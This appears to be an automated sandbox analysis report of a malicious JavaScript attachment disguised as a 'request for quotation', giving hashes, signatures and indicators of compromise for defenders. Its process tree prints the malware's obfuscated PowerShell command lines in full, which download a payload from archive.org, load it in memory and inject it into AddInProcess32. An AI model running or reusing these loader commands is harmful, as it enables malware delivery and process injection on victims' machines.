Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-09-2024 13:25

General

  • Target

    REQUEST FOR QUOTATION.js

  • Size

    318KB

  • MD5

    08dab38ef2c8bdada3b4928145b777f7

  • SHA1

    8d9fe403c417c9fc50ed09528dd2b096ebfe6375

  • SHA256

    cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41

  • SHA512

    52aeb79f20660946bb7095addb26de8f115d29c4b15cd8169418d73db102c4ca7f79096780baa896357efe40999957969631b718557fd7c35e7375a2288ea5d5

  • SSDEEP

    6144:ae3G0HrhDz6LXUo09qGOWIC5pbyo68vh146TIVdDfo+IitZsVAsuG7EEqZ1Cr81b:Zr81VpOhEUX7dyIUwRjsSXKs0AUUbPMz

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    ps1.dropper: https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
    exe.dropper: https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YA3U86Z9EWPO5EYAHIC8.temp

    Filesize

    7KB

    MD5

    7614c5bae9bac6b15af708d9cfa8bf37

    SHA1

    10fc114ffeba420f34c6d35e258a3ece7dc81b39

    SHA256

    70704120caa468ddb6ff42eb01486dd1549dc41a54500e596c8b3bc7161e9547

    SHA512

    0160c371241dcb830cdddd5429d16e34478da1b07aa226ad831afaf07e9df67957aecb4e3887581755aa73301bd117240476cbf13ad9ac972314e5888c66a9d5

  • memory/2344-4-0x000007FEF61CE000-0x000007FEF61CF000-memory.dmp

    Filesize

    4KB

  • memory/2344-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

  • memory/2344-8-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-9-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-10-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-7-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

  • memory/2344-11-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2344-17-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB